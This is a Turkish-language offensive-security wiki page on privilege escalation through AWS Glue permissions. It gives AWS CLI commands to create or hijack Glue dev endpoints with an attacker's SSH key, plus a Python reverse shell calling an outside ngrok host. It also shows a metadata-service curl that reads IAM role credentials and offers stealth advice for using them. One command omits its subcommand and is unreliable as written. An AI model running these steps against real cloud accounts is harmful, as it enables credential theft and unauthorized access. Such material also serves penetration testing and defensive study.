AWS - Glue Privesc

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Bu izinlere sahip kullanıcılar, mevcut bir hizmet rolünü Glue tarafından üstlenilebilir şekilde atayarak yeni bir AWS Glue geliştirme uç noktası oluşturabilirler.

Kurulumdan sonra, saldırgan uç noktanın örneğine SSH ile bağlanabilir ve atanan rolün IAM kimlik bilgilerini çalabilir:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Gizlilik amacıyla, Glue sanal makinesi içinden IAM kimlik bilgilerini kullanmanız önerilir.

Olası Etki: Belirtilen glue hizmet rolüne privesc.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Bu izne sahip kullanıcılar, mevcut bir Glue geliştirme uç noktasının SSH anahtarını değiştirebilir, bu da ona SSH erişimi sağlar. Bu, saldırganın uç noktanın bağlı rolünün ayrıcalıklarıyla komutlar çalıştırmasına olanak tanır:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Olası Etki: Kullanılan glue hizmet rolüne privesc.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

iam:PassRole ile birlikte glue:CreateJob veya glue:UpdateJob ve glue:StartJobRun veya glue:CreateTrigger yetkilerine sahip kullanıcılar, AWS Glue işini oluşturabilir veya güncelleyebilir, herhangi bir Glue hizmet hesabı ekleyebilir ve işin yürütülmesini başlatabilir. İşin yetenekleri, ters bir shell kurmak için istismar edilebilecek rastgele Python kodu çalıştırmayı içerir. Bu ters shell daha sonra Glue işine ekli olan IAM kimlik bilgilerini dışarı aktarmak için kullanılabilir ve bu da o rolün izinlerine dayalı olarak potansiyel yetkisiz erişim veya eylemlere yol açabilir:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Potansiyel Etki: Belirtilen glue hizmet rolüne privesc.

glue:UpdateJob

Sadece güncelleme izni ile bir saldırgan, zaten ekli olan rolün IAM Kimlik Bilgilerini çalabilir.

Potansiyel Etki: Ekli olan glue hizmet rolüne privesc.

Referanslar

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/